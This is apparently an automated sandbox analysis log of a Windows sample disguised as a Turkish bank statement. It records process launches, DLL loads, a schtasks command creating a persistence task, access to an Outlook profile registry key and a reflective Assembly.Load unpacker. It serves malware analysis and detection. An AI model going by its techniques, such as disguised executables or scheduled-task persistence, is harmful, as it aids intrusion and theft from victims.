Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmpA327.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process created: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process created: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Hesap_Hareketleri_10122024_html.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Hesap_Hareketleri_10122024_html.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Hesap_Hareketleri_10122024_html.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Qqvl.pdbSHA256< source: Hesap_Hareketleri_10122024_html.exe, UDYiGmDlq.exe.1.dr
Source:	Binary string: Qqvl.pdb source: Hesap_Hareketleri_10122024_html.exe, UDYiGmDlq.exe.1.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	.Net Code: UrIOH5u7v9 System.Reflection.Assembly.Load(byte[])
